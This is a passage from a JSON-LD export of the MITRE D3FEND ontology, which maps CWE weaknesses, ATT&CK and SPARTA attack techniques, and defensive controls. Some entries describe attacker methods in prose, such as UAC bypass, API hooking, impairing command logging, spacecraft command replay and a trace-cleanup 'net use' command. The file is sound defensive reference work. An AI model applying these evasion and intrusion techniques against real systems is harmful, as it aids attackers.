      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N23456c686fdd4bc19fa4e523a23c65bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:DigitalAccessBadge",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A credential used to gain entry to an area having automated access control entry points. Example media being magnetic stripe, proximity, barcode, or smart cards are examples.",
      "d3f:operates": {
        "@id": "d3f:ElectronicCombinationLock"
      },
      "d3f:synonym": [
        "CAC",
        "Common Access Card",
        "PIV",
        "Personal Identity Verification"
      ],
      "rdfs:label": "Digital Access Badge",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Access_badge"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-116r1.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Credential"
        },
        {
          "@id": "_:N090fda36eef441db89d706a9905420c1"
        }
      ]
    },
    {
      "@id": "_:N090fda36eef441db89d706a9905420c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:operates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:Reference-NullPointerDereference_CWE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/data/definitions/476.html"
      },
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:NullPointerChecking"
      },
      "d3f:kb-reference-title": "CWE-476: NULL Pointer Dereference",
      "rdfs:label": "Reference - Null Pointer Dereferencing - CWE-476"
    },
    {
      "@id": "d3f:CWE-250",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-250",
      "d3f:definition": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.",
      "rdfs:label": "Execution with Unnecessary Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-269"
        },
        {
          "@id": "d3f:CWE-657"
        }
      ]
    },
    {
      "@id": "d3f:CWE-62",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-62",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "rdfs:label": "UNIX Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CWE-608",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-608",
      "d3f:definition": "An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter.",
      "rdfs:label": "Struts: Non-private Field in ActionForm Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-300",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-300",
      "d3f:definition": "The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.",
      "d3f:synonym": [
        "Adversary-in-the-Middle / AITM",
        "Interception attack",
        "Man-in-the-Middle / MITM",
        "Manipulator-in-the-Middle",
        "Monkey-in-the-Middle",
        "Monster-in-the-Middle",
        "On-path attack",
        "Person-in-the-Middle / PITM"
      ],
      "rdfs:label": "Channel Accessible by Non-Endpoint",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:T1617",
      "@type": "owl:Class",
      "d3f:attack-id": "T1617",
      "d3f:definition": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.",
      "rdfs:label": "Hooking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Hooking"
    },
    {
      "@id": "d3f:ServiceStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the cessation of a service application’s operations, transitioning it to an inactive state while ceasing its functionality to clients or dependent systems.",
      "rdfs:label": "Service Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationStopEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nadde33bb57c44320aa56270333737cea"
        }
      ]
    },
    {
      "@id": "_:Nadde33bb57c44320aa56270333737cea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStartEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtFlushInstructionCache",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtFlushInstructionCache",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:Reference-TokenlessBiometricTransactionAuthorizationMethodAndSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5870723A/"
      },
      "d3f:kb-abstract": "A method and system for tokenless authorization of commercial transactions between a buyer and a seller using a computer system. A transaction is proposed by a seller, and the buyer signals his acceptance by entering his personal authentication information comprising a PIN and at least one biometric sample, forming a commercial transaction message. The commercial transaction message is forwarded to the computer system, where the computer system compares the personal authentication information in the commercial transaction message with previously registered buyer biometric samples. If the computer system successfully identifies the buyer, a financial account of the buyer is debited and a financial account of the seller is credited, and the results of the transaction are presented to both buyer and seller. As a result of the invention, a buyer can conduct commercial transactions without having to use any tokens such as portable man-made memory devices such as smartcards or swipe cards. The invention allows buyers to quickly select one of a group of different financial accounts from which to transfer funds. The invention further indicates to the user that the authentic computer system was accessed by the use of a private code that is returned to the buyer after the identification is complete. The invention additionally permits an authorized buyer to alert authorities in the event of an emergency, such as when a transaction is coerced.",
      "d3f:kb-organization": "SmartTouch Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:BiometricAuthentication"
      },
      "d3f:kb-reference-title": "Tokenless biometric transaction authorization method and system",
      "rdfs:label": "Reference - Tokenless biometric transaction authorization method and system"
    },
    {
      "@id": "d3f:Vendor",
      "@type": "owl:Class",
      "d3f:definition": "A vendor sells or supplies goods and services to customers.",
      "rdfs:label": "Vendor",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:CWE-1235",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1235",
      "d3f:definition": "The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations.",
      "rdfs:label": "Incorrect Use of Autoboxing and Unboxing for Performance Critical Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:T1170",
      "@type": "owl:Class",
      "d3f:attack-id": "T1170",
      "d3f:definition": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.005",
      "rdfs:label": "Mshta",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-653",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-653",
      "d3f:definition": "The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.",
      "d3f:synonym": "Separation of Privilege",
      "rdfs:label": "Improper Isolation or Compartmentalization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:T0832",
      "@type": "owl:Class",
      "d3f:attack-id": "T0832",
      "d3f:definition": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Manipulation of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Manipulation of View"
    },
    {
      "@id": "d3f:ComputerEnclosure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A part providing protection of computer equipment against certain external influences and protects against direct contact.",
      "rdfs:label": "Computer Enclosure",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Category:Computer_enclosure"
        },
        "[IEV 826-03-12]"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:Ncec009eeb2ce4c438a7f7f45378c8fee"
        },
        {
          "@id": "_:Ne81c00da54eb43deb522596a10fde7b7"
        }
      ]
    },
    {
      "@id": "_:Ncec009eeb2ce4c438a7f7f45378c8fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerPlatform"
      }
    },
    {
      "@id": "_:Ne81c00da54eb43deb522596a10fde7b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLock"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-10_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:control-name": "Non-repudiation | Digital Signatures",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-10(5)"
    },
    {
      "@id": "d3f:RD-0001.04",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.04",
      "d3f:definition": "In practice, adversaries are far more likely to purchase launch services (rideshare slots, hosted-payload opportunities) than to “acquire a launch facility.” Nevertheless, understanding and exploiting launch infrastructure, pads, integration cells, range networks, and control centers, could support resource development (e.g., positioning an asset, staging equipment near range telemetry). The realistic objective is influence over access to orbit, schedule, or integration touchpoints rather than ownership of a pad. Shell entities might book benign-sounding rides, insert dual-use payloads, or seek special handling that relaxes controls.",
      "rdfs:label": "Launch Facility - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Launch Facility"
    },
    {
      "@id": "d3f:DS0013",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information from host telemetry providing insights about system status, errors, or other notable functional activity",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Sensor Health (ATT&CK DS)"
    },
    {
      "@id": "d3f:ScheduledJobEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a scheduled task is activated, allowing it to execute according to its defined parameters.",
      "rdfs:label": "Scheduled Job Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N429d11a9a73a464ebb2dd3ac4e9209ef"
        }
      ]
    },
    {
      "@id": "_:N429d11a9a73a464ebb2dd3ac4e9209ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:RemoteAuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote authentication service provides for the authentication of a user across a network (i.e., remotely).",
      "rdfs:label": "Remote Authentication Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:NetworkService"
        }
      ]
    },
    {
      "@id": "d3f:Reference-NISTIR-8011-Volume-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.IR.8011-1"
      },
      "d3f:kb-abstract": "This volume introduces concepts to support automated assessment of most of the security controls in NIST Special Publication (SP) 800-53. Referencing SP 800-53A, the controls are divided into more granular parts (determination statements) to be assessed. The parts of the control assessed by each determination statement are called control items. The control items are then grouped into the appropriate security capabilities. As suggested by SP 800-53 Revision 4, security capabilities are groups of controls that support a common purpose. For effective automated assessment, testable defect checks are defined that bridge the determination statements to the broader security capabilities to be achieved and to the SP 800-53 security control items themselves. The defect checks correspond to security sub-capabilities-called sub-capabilities because each is part of a larger capability. Capabilities and sub-capabilities are both designed with the purpose of addressing a series of attack steps. Automated assessments (in the form of defect checks) are performed using the test assessment method defined in SP 800-53A by comparing a desired and actual state (or behavior).",
      "d3f:kb-author": "Kelley Dempsey, Paul Eavy, and George Moore",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Interagency Report 8011 Volume 1 - Automation Support for Security Control Assessments",
      "rdfs:label": "Reference - NISTIR 8011 Volume 1 - Automation Support for Security Control Assessments"
    },
    {
      "@id": "d3f:CWE-1223",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1223",
      "d3f:definition": "A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue.",
      "rdfs:label": "Race Condition for Write-Once Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:ResidualNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RNN",
      "d3f:definition": "A residual neural network (ResNet) is an artificial neural network (ANN). It is a gateless or open-gated variant of the HighwayNet, the first working very deep feedforward neural network with hundreds of layers, much deeper than previous neural networks.",
      "d3f:kb-article": "## References\nWikipedia contributors. (2021, August 23). Residual neural network. In Wikipedia, The Free Encyclopedia. [Link](https://en.wikipedia.org/wiki/Residual_neural_network)",
      "rdfs:label": "Residual Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:ConvolutionalNeuralNetwork"
      }
    },
    {
      "@id": "d3f:T1562.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.003",
      "d3f:definition": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.",
      "d3f:may-modify": [
        {
          "@id": "d3f:UserInitScript"
        },
        {
          "@id": "d3f:WindowsRegistryKey"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:ProcessEnvironmentVariable"
      },
      "rdfs:label": "Impair Command History Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nc1d8133943294dce87ea70de04e5b989"
        },
        {
          "@id": "_:N07474f0920074e7a881abd7d43532fc0"
        },
        {
          "@id": "_:Nc283c0e6766043babaea49ece2e71c58"
        }
      ]
    },
    {
      "@id": "_:Nc1d8133943294dce87ea70de04e5b989",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "_:N07474f0920074e7a881abd7d43532fc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "_:Nc283c0e6766043babaea49ece2e71c58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessEnvironmentVariable"
      }
    },
    {
      "@id": "d3f:UserLogonInitResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user logon initialization resource contains information used to configure a user's environment when a user logs into a system.",
      "rdfs:label": "User Logon Init Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:OSAPIWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that writes data from a buffer in memory to a file or output stream.",
      "d3f:invokes": {
        "@id": "d3f:WriteFile"
      },
      "rdfs:label": "OS API Write File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nea5f8e9467c14d37ba276d03825947e5"
        }
      ]
    },
    {
      "@id": "_:Nea5f8e9467c14d37ba276d03825947e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WriteFile"
      }
    },
    {
      "@id": "d3f:SystemFirewallConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:configures": {
        "@id": "d3f:Host-basedFirewall"
      },
      "d3f:definition": "The configuration for a individual host operating system's firewall.",
      "rdfs:label": "System Firewall Configuration",
      "rdfs:seeAlso": {
        "@id": "dbr:Firewall_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        },
        {
          "@id": "_:N4b81c762813b4a09b7dcb8cafc2e04c4"
        }
      ]
    },
    {
      "@id": "_:N4b81c762813b4a09b7dcb8cafc2e04c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:configures"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host-basedFirewall"
      }
    },
    {
      "@id": "d3f:EXF-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0001",
      "d3f:definition": "The adversary re-sends previously valid commands or procedures to cause the spacecraft to transmit data again, then captures the resulting downlink. Typical targets are recorder playbacks, payload product dumps, housekeeping snapshots, or file directory listings. By aligning replays with geometry (e.g., when the satellite is in view of actor-controlled apertures) and with acceptance conditions (counters, timetags, mode), the attacker induces legitimate transmissions that appear routine to operators. Variants include selectively replaying index ranges to fetch only high-value intervals, reissuing subscription/telemetry-rate changes to increase data volume, or queueing playbacks that fire during later passes when interception is feasible.",
      "rdfs:label": "Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Replay"
    },
    {
      "@id": "d3f:CWE-174",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-174",
      "d3f:definition": "The product decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations.",
      "rdfs:label": "Double Decoding of the Same Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-172"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1063",
      "@type": "owl:Class",
      "d3f:attack-id": "T1063",
      "d3f:definition": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1518.001",
      "rdfs:label": "Security Software Discovery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1518.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-794",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-794",
      "d3f:definition": "The product receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of Multiple Instances of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-792"
      }
    },
    {
      "@id": "d3f:CollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gather data of interest to their goal.",
      "d3f:enables": {
        "@id": "d3f:TA0009"
      },
      "rdfs:label": "Collection Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N7b68fa77fecd468aa078b413c44d98d8"
        }
      ]
    },
    {
      "@id": "_:N7b68fa77fecd468aa078b413c44d98d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0009"
      }
    },
    {
      "@id": "d3f:AML.T0000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000",
      "d3f:definition": "Adversaries may search for publicly available research and technical documentation to learn how and where AI is used within a victim organization.\nThe adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective.\nOrganizations often use open source model architectures trained on additional proprietary data in production.\nKnowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy AI Model](/techniques/AML.T0005)).\nAn adversary can search these resources for publications for authors employed at the victim organization.\n\nResearch and technical materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).",
      "rdfs:label": "Search Open Technical Databases - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open Technical Databases"
    },
    {
      "@id": "d3f:T1588.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.002",
      "d3f:definition": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)",
      "rdfs:label": "Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:T1548.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.002",
      "d3f:definition": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)",
      "d3f:executes": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Bypass User Account Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N6bb28c0c8daa4af9ae490cd9eba5e521"
        },
        {
          "@id": "_:Nd932a72c320548529be89ad21b8b74a1"
        },
        {
          "@id": "_:N1a162dcb6cd04d9db5183e7fe7b92f81"
        }
      ]
    },
    {
      "@id": "_:N6bb28c0c8daa4af9ae490cd9eba5e521",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:Nd932a72c320548529be89ad21b8b74a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N1a162dcb6cd04d9db5183e7fe7b92f81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1126",
      "@type": "owl:Class",
      "d3f:attack-id": "T1126",
      "d3f:definition": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.005",
      "rdfs:label": "Network Share Connection Removal",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1627.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1627.001",
      "d3f:definition": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)",
      "rdfs:label": "Geofencing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1627"
      },
      "skos:prefLabel": "Geofencing"
    },
    {
      "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeSymbiotes",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://nsl.cs.columbia.edu/projects/minestrone/papers/Symbiotes.pdf"
      },
      "d3f:kb-abstract": "A large number of embedded devices on the internet, such as\nrouters and VOIP phones, are typically ripe for exploitation. Little to no defensive technology, such as AV scanners or IDS's, are available to protect these devices. We propose a host-based defense mechanism, which we call Symbiotic Embedded Machines (SEM), that is specifically designed\nto inject intrusion detection functionality into the firmware of the device.",
      "d3f:kb-author": "Ang Cui, Salvatore J. Stolfo",
      "d3f:kb-organization": "Department of Computer Science Columbia University",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareEmbeddedMonitoringCode"
      },
      "d3f:kb-reference-title": "Defending Embedded Systems with Software Symbiotes",
      "rdfs:label": "Reference - Firmware Embedded Monitoring Code Symbiotes"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Content of Audit Records",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-3"
    },
    {
      "@id": "d3f:VariableInitialization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-VI",
      "d3f:definition": "Setting variables to a known value before use.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nInitializing variables upon declaration ensures that the variable has a known quantity before use.\n\n## Considerations\n* Default behavior when declaring variables varies by language.\n* This is particularly important in programming languages that do not initialize variables to a default value upon declaration. In these instances, the value that a variable will contain after declaration is indeterminate which can cause issues. In fact, that value could be different each time the program is ran.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CManualIntegerInitialization_GNU"
        },
        {
          "@id": "d3f:Reference-VariableInitialization_CWE"
        }
      ],
      "rdfs:label": "Variable Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N78682578620244128b855ae378fa967e"
        }
      ]
    },
    {
      "@id": "_:N78682578620244128b855ae378fa967e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CCI-001668_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs malicious code protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001668"
    },
    {
      "@id": "d3f:ATTACKICSImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0105"
      },
      "rdfs:label": "Impact Technique - ATTACK ICS",
